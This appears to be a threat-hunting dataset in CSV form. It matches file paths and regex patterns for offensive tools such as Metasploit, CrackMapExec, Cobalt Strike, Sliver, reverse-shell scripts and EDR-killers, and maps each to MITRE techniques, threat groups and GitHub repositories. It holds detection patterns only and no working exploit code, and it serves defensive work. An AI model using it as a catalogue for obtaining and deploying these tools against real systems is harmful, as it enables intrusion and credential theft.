"*/procdump.py*",".{0,1000}\/procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9906"
"*/process_herpaderping/*",".{0,1000}\/process_herpaderping\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9908"
"*/process_killer.cpp*",".{0,1000}\/process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","9909"
"*/processhider.c*",".{0,1000}\/processhider\.c.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","9912"
"*/processinjection.exe*",".{0,1000}\/processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9913"
"*/Process-Instrumentation-Syscall-Hook*",".{0,1000}\/Process\-Instrumentation\-Syscall\-Hook.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9914"
"*/prometheus.exe",".{0,1000}\/prometheus\.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","9916"
"*/ProtectMyTooling.git*",".{0,1000}\/ProtectMyTooling\.git.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9917"
"*/ProtectMyTooling.py*",".{0,1000}\/ProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9918"
"*/ProtectMyTooling.yaml*",".{0,1000}\/ProtectMyTooling\.yaml.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9919"
"*/ProtectMyToolingGUI.py*",".{0,1000}\/ProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9920"
"*/protocols/ftp.py*",".{0,1000}\/protocols\/ftp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9921"
"*/protocols/ldap.py*",".{0,1000}\/protocols\/ldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9922"
"*/protocols/mssql.py*",".{0,1000}\/protocols\/mssql\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9923"
"*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9924"
"*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9925"
"*/protocols/smb.py*",".{0,1000}\/protocols\/smb\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9926"
"*/protocols/ssh.py*",".{0,1000}\/protocols\/ssh\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9927"
"*/Proxmark3*",".{0,1000}\\Proxmark3.{0,1000}","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/Proxmark/proxmark3","1","1","N/A","network exploitation tool","N/A","10","3288","923","2024-02-03T13:32:36Z","2014-03-16T23:36:31Z","9933"
"*/proxy/Tor.py*",".{0,1000}\/proxy\/Tor\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","9934"
"*/proxy/tor_paths.py*",".{0,1000}\/proxy\/tor_paths\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","9935"
"*/Proxy_Def_File_Generator.cna*",".{0,1000}\/Proxy_Def_File_Generator\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","9936"
"*/proxychains-*.zip*",".{0,1000}\/proxychains\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9937"
"*/proxychains.conf*",".{0,1000}\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9938"
"*/proxychains.git*",".{0,1000}\/proxychains\.git.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9939"
"*/proxychains-ng*",".{0,1000}\/proxychains\-ng.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9940"
"*/ProxyLogon.git*",".{0,1000}\/ProxyLogon\.git.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","9941"
"*/proxylogon.git*",".{0,1000}\/proxylogon\.git.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","1","N/A","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","9942"
"*/proxylogon.py*",".{0,1000}\/proxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","9943"
"*/proxymaybeshell*",".{0,1000}\/proxymaybeshell.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9944"
"*/proxyTunnel.ps1*",".{0,1000}\/proxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","9945"
"*/ps_windows.go*",".{0,1000}\/ps_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","9946"
"*/ps1_oneliner.py*",".{0,1000}\/ps1_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9947"
"*/PS1ToBase64.ps1*",".{0,1000}\/PS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","9948"
"*/PS2EXE.git*",".{0,1000}\/PS2EXE\.git.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","9949"
"*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","9950"
"*/PS2EXE.ps1*",".{0,1000}\/PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","1","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","9951"
"*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9953"
"*/PS2EXE/*",".{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","9954"
"*/PSAmsi.git*",".{0,1000}\/PSAmsi\.git.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","9955"
"*/PSAsyncShell.git*",".{0,1000}\/PSAsyncShell\.git.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9956"
"*/PSAsyncShell.ps1*",".{0,1000}\/PSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9957"
"*/PSAsyncShell.sh*",".{0,1000}\/PSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9958"
"*/PSAsyncShell-main*",".{0,1000}\/PSAsyncShell\-main.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9959"
"*/PSAttack.git*",".{0,1000}\/PSAttack\.git.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9960"
"*/PSAttack.zip*",".{0,1000}\/PSAttack\.zip.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9961"
"*/PSAttack/releases/download/*",".{0,1000}\/PSAttack\/releases\/download\/.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9962"
"*/ps-empire*",".{0,1000}\/ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","9963"
